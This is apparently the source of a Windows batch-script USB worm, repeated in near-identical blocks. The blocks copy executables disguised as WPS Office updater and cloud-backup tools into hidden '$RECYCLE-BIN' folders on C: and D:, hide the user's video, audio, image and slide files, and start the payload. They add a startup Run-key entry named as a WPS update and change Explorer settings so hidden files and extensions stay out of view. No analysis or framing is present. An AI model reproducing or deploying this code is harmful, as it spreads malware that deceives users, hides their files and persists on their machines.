"%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f dmo @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set dmo=.mp4,.flv,.rmvb,.mpj,.mpg,.avi,.m4a,.mkv,.mov,.vob,.swf,.mpeg,.webm,.wmv,.3gp for %%h in (%dmo%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f dmu @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set dmu=.mp3,.m4a,.cd,.ogg,.asf,.wma,.wav,.mp3pro,.rm,.real,.ape,.module,.midi,.vqf,.audible,.flac,.vbr for %%h in (%dmu%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f dph @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set dph=.jpg,.bmp,.tga,.tif,.psd for %%h in (%dph%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f dpp @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set dpp=.ppt,.pot,.pps,.sldx for %%h in (%dpp%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" 